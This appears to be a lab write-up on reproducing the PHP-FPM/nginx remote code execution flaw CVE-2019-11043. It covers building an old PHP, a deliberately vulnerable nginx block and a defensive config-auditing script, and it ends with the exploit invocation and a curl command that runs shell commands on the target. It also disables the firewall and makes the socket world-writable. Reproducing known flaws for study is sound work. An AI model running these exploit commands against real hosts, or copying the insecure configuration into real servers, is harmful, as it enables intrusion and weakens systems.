A recent project required reproducing an nginx exploit, specifically the exploit for CVE-2019-11043, a remote code execution vulnerability in PHP-FPM that is reachable through a common nginx FastCGI configuration;
Exploit source: GitHub, neex/phuip-fpizdam: Exploit for CVE-2019-11043
After reading it, I compiled the source code on Kali. Note that Go 1.13 or later is needed to build it. The compiled executable runs on Linux.
What cost me the most effort is the vulnerable configuration the target machine requires: PHP 7.1.x below 7.1.33, 7.2.x below 7.2.24, or 7.3.x below 7.3.11.
There is an article describing in detail how to reproduce this exploit ( https://blog.simos.info/testing-cve-2019-11043-php-fpm-security-vulnerability-with-lxd-system-containers/ ). Anticipating that the required version might no longer be downloadable by the time the article was published, its author also points to old php-fpm deb packages ( http://security.ubuntu.com/ubuntu/pool/universe/p/php7.2/ ). However, I could not resolve the dependency problems while installing those packages, so I had to compile an old PHP version from source. (The source archive and its extraction code are provided at the end.)
Unpack the source code and enter the directory. Before compiling, install the build dependencies:
sudo -i
apt-get install gcc
apt-get install g++
apt-get install libxml2-dev
apt-get install libssl-dev
apt-get install libbz2-dev
apt-get install libjpeg-dev
apt install libpng-dev
apt install libmcrypt-dev
apt-get install curl
cd /usr/local/include
ln -s /usr/include/x86_64-linux-gnu/curl curl
apt-get install libcurl4-gnutls-dev
Pay special attention to the last three lines: they resolve the error "configure: error: Please reinstall the libcurl distribution" that otherwise appears when running ./configure. The PHP 7.1 configure script looks for the curl headers under /usr/include/curl or /usr/local/include/curl, while Debian and Ubuntu install them in the multiarch directory /usr/include/x86_64-linux-gnu/curl; the symlink bridges that gap.
With that done, the build can proceed:
./configure --prefix=/usr/local/php --enable-fpm --with-mcrypt --enable-mbstring --disable-pdo --with-curl --disable-debug --disable-rpath --enable-inline-optimization --with-bz2 --with-zlib --enable-sockets --enable-sysvsem --enable-sysvshm --enable-pcntl --enable-mbregex --with-mhash --enable-zip --with-pcre-regex --with-mysqli --with-gd --with-jpeg-dir --with-openssl
make && make install
make test
make clean
Create symlinks (the prefix given to ./configure above is /usr/local/php, so the binaries live there, not under a versioned directory):
ln -s /usr/local/php/bin/php /usr/bin/php
ln -s /usr/local/php/bin/phpize /usr/bin/phpize
ln -s /usr/local/php/bin/pecl /usr/bin/pecl
ln -s /usr/local/php/bin/php-config /usr/bin/php-config
ln -s /usr/local/php/sbin/php-fpm /usr/bin/php-fpm
Add user and group (the default php-fpm pool runs as nobody:nobody; on Ubuntu the nobody user already exists, so useradd reports that and the message can be ignored, but the nobody group usually has to be created):
useradd nobody
groupadd nobody
Set up the configuration files:
cd /usr/local/php/etc
cp php-fpm.conf.default php-fpm.conf
cd /usr/local/php/etc/php-fpm.d
cp www.conf.default www.conf
Now let's test whether the installation succeeded:
cd /usr/local/php/sbin
./php-fpm -v
If php-fpm prints its version information, the build and installation succeeded.
Next, install nginx. Since no particular nginx version is required, install it straight from the package manager:
apt-get install nginx
Next, configure the connection between php-fpm and nginx.
Part 1: Configure php-fpm
#Add user and group
sudo -i
useradd nginx
usermod -G nginx nginx
#php-fpm and nginx communicate over a unix socket
cd /usr/local/php/var/run
touch php7.1-fpm.sock
chown nginx:nginx php7.1-fpm.sock
chmod 777 php7.1-fpm.sock
(Note that php-fpm removes and re-creates this socket every time it starts, applying listen.owner, listen.group and listen.mode from www.conf, so the touch/chown/chmod above only hold until the first start; see the permission note in Part 3.)
cd /usr/local/php/etc/php-fpm.d
gedit www.conf   #modify www.conf as follows
user = nginx
group = nginx
listen = /usr/local/php/var/run/php7.1-fpm.sock
Remove the semicolon comment in front of listen.owner, listen.group and listen.mode, and set:
listen.owner = nginx
listen.group = nginx
(listen.mode does not need to be changed.) Then close www.conf.
#Check that php-fpm still accepts the configuration after the change
cd /usr/local/php/sbin
./php-fpm -t   #tests the configuration file and exits; -v only prints the version and does not read www.conf
There should be no problem.
Part 2: Configure nginx
gedit /etc/nginx/sites-enabled/default   #replace the contents of the default site file with the following
--------------------------------------------------------------------------------------------------------------------------------
# See article at https://blog.simos.info/testing-cve-2019-11043-php-fpm-security-vulnerability-with-lxd-system-containers/
# Location: /etc/nginx/sites-enabled/default
server {
    listen 80 default_server;
    root /var/www/html;

    # Add index.php to the list if you are using PHP
    index index.html index.php;

    server_name _;

    location / {
        # First attempt to serve request as file, then
        # as directory, then fall back to displaying a 404.
        try_files $uri $uri/ =404;
    }

    # pass PHP scripts to FastCGI server
    #
    location ~ [^/]\.php(/|$) {
        include fastcgi.conf;

        # regex to split $uri to $fastcgi_script_name and $fastcgi_path_info
        fastcgi_split_path_info ^(.+\.php)(/.+)$;

        # Check that the PHP script exists before passing it.
        # Deliberately left commented out: with this check enabled, the crafted
        # request (whose URI contains an encoded newline) gets a 404 before it
        # ever reaches php-fpm, and the exploit does not work.
        #try_files $fastcgi_script_name =404;

        # Bypass the fact that try_files resets $fastcgi_path_info
        # see: http://trac.nginx.org/nginx/ticket/321
        set $path_info $fastcgi_path_info;
        fastcgi_param PATH_INFO $path_info;

        fastcgi_index index.php;
        fastcgi_pass unix:/usr/local/php/var/run/php7.1-fpm.sock;
    }
}
--------------------------------------------------------------------------------------------------------------------------------
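The server block above is vulnerable because of three things acting together: a fastcgi_split_path_info regex whose second capture is (/.+)$, PATH_INFO handed to php-fpm from that capture, and no try_files existence check in the PHP location. The following Python is an added example written for this page (it is not code from the original post or from the phuip-fpizdam project): it audits an nginx configuration for exactly that pattern, checks a PHP version against the fixed releases named above, and emulates fastcgi_split_path_info on a URI containing an encoded newline to show why PATH_INFO ends up empty. The configuration strings are constructed from this page's server block and the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample: the vulnerable server block from this page, condensed
# to the directives that matter for the audit.
VULNERABLE_CONF = r"""
server {
    listen 80 default_server;
    root /var/www/html;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ [^/]\.php(/|$) {
        include fastcgi.conf;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        #try_files $fastcgi_script_name =404;
        set $path_info $fastcgi_path_info;
        fastcgi_param PATH_INFO $path_info;
        fastcgi_index index.php;
        fastcgi_pass unix:/usr/local/php/var/run/php7.1-fpm.sock;
    }
}
"""

# Same block with the file-existence check re-enabled (constructed hardened variant).
HARDENED_CONF = VULNERABLE_CONF.replace("#try_files", "try_files")

# First patched release per branch, as listed on this page; other branches are reported as unknown.
FIXED_IN = {(7, 1): (7, 1, 33), (7, 2): (7, 2, 24), (7, 3): (7, 3, 11)}


def php_version_affected(version):
    """True if `version` is below the fix for its branch, False if at or above it,
    None for branches this page's advisory text does not cover."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    fixed = FIXED_IN.get(parts[:2])
    if fixed is None:
        return None
    return parts < fixed


def location_blocks(conf):
    """Return (header, body) pairs for every `location` block, matching braces
    so that nested blocks do not cut the scan short."""
    blocks = []
    for m in re.finditer(r"location\s+([^{]+)\{", conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        blocks.append((m.group(1).strip(), conf[m.end():i - 1]))
    return blocks


def strip_comments(body):
    """Drop everything after '#' on each line; commented-out directives are inactive."""
    return "\n".join(line.split("#", 1)[0] for line in body.splitlines())


def audit_php_location(body):
    """Return the reasons a location body matches the CVE-2019-11043 pattern:
    a split_path_info regex ending in (/.+)$ or (/.*)$, PATH_INFO passed to
    php-fpm from that capture (directly or via `set`), and no try_files check.
    An empty list means at least one ingredient is missing."""
    active = strip_comments(body)
    split = re.search(r"fastcgi_split_path_info\s+(\S+)\s*;", active)
    if not split or not re.search(r"\(/\.[+*]\)\$$", split.group(1)):
        return []
    param = re.search(r"fastcgi_param\s+PATH_INFO\s+\$(\w+)\s*;", active)
    if not param:
        return []
    var = param.group(1)
    if var != "fastcgi_path_info" and not re.search(
            r"set\s+\$" + re.escape(var) + r"\s+\$fastcgi_path_info\s*;", active):
        return []
    if re.search(r"\btry_files\b", active):
        return []  # existence check in place: crafted URI gets a 404 before php-fpm
    return [
        "fastcgi_split_path_info " + split.group(1),
        "PATH_INFO is taken from $fastcgi_path_info",
        "no try_files existence check in the location",
    ]


def audit_nginx_conf(conf):
    """Map each location header matching the vulnerable pattern to its findings."""
    findings = {}
    for header, body in location_blocks(conf):
        reasons = audit_php_location(body)
        if reasons:
            findings[header] = reasons
    return findings


def split_path_info(uri, regex=r"^(.+\.php)(/.+)$"):
    """Emulate nginx's fastcgi_split_path_info on an already URL-decoded URI.
    As in PCRE, '.' does not match a newline, so a decoded %0a makes the regex
    fail and PATH_INFO is left empty, which is the state the exploit needs."""
    m = re.match(regex, uri)
    if not m:
        return uri, ""
    return m.group(1), m.group(2)


if __name__ == "__main__":
    print(audit_nginx_conf(VULNERABLE_CONF))
    print(audit_nginx_conf(HARDENED_CONF))
    print(split_path_info(unquote("/index.php/some/path")))
    print(split_path_info(unquote("/index.php/PHP%0Aanything.php")))
```

Running the script flags only the PHP location of the vulnerable variant and reports nothing for the hardened one, where the single uncommented try_files line is enough to close the pattern even on an unpatched PHP. The last call shows the precondition the exploit relies on: once %0a is decoded, the split regex no longer matches and the request reaches php-fpm with an empty PATH_INFO.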
Part 3: Test
After the above configuration is complete, start both services:
#Start php-fpm and nginx
sudo -i
cd /usr/local/php/sbin
./php-fpm
service nginx start
# Grant permissions on php7.1-fpm.sock
# Two things to note: 1. do this only after php-fpm and nginx have started, since php-fpm re-creates the socket on startup and a chmod done earlier is lost;
# 2. the permission is lost again after every restart or reboot and has to be re-applied.
# Why the chmod is needed at all: the Ubuntu nginx package runs its worker processes as www-data (the "user" directive in /etc/nginx/nginx.conf), while www.conf above hands the socket to nginx:nginx with the default listen.mode of 0660, so nginx cannot connect. Setting listen.owner and listen.group to www-data in www.conf (or changing nginx's "user" to nginx) makes the socket reachable without a world-writable chmod after every start.
cd /usr/local/php/var/run
chmod 777 php7.1-fpm.sock
echo "<?php echo '<p>hello World</p>'; ?>" | sudo tee /var/www/html/index.php
Then open http://localhost/ in a browser; if "hello World" appears, nginx and php-fpm are talking to each other correctly.
Well, as the saying goes, three minutes on stage take ten years of practice offstage; finally it's time to run the exploit.
Switch the target machine's network adapter to bridged mode, use ifconfig to find the target's IP address, and run ufw disable to turn off the firewall.
Run the phuip-fpizdam executable from another Linux system (mine is Ubuntu 18.04).
First run the following command (the exploit first checks whether the configuration is vulnerable):
./phuip-fpizdam http://<ip>/index.php
For a vulnerable configuration you will get output like the following (screenshot not reproduced here).
Once the configuration has been confirmed vulnerable, you can use this exploit to execute commands remotely through the URL; the format is as follows:
curl "http://<ip>/index.php?a=/bin/sh+-c+'which+which'&"
For example (screenshot omitted):
The output of id is returned, consistent with the author's example, so I can say that I have successfully reproduced this exploit :)
Note: the exploit does not succeed on every request, so try a few times! (php-fpm runs a pool of worker processes and only the worker poisoned by the exploit executes the injected command; requests served by the other workers return the normal page.)
Source code of PHP 7.1.0, link: https://pan.baidu.com/s/1ntXNkElSFWTY9nj7BIAHEg extraction code: q7qm
If you run into problems, check the nginx error log (/var/log/nginx/error.log), or contact me by email ([email protected]).